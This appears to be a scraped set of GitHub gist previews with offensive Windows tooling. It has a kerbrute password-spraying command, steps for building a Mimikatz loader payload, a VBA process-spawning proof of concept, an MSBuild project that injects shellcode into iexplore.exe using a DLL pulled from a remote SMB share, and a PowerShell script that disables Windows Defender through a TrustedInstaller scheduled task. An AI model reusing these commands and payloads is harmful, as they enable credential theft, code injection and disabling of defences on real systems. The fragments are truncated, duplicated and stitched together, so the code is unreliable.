With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a | |
3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code. | |
4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file. | |
6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs" | |
typedef interface IEditionUpgradeManager IEditionUpgradeManager; | |
typedef struct IEditionUpgradeManagerVtbl { | |
BEGIN_INTERFACE | |
HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
__RPC__in IEditionUpgradeManager * This, | |
__RPC__in REFIID riid, |
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
' by @_xpn_ | |
' | |
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
Const HEAP_ZERO_MEMORY = &H8& | |
Const SW_HIDE = &H0& | |
Const MAX_PATH = 260 | |
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
I hereby claim:
To claim this, I am signing this object:
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |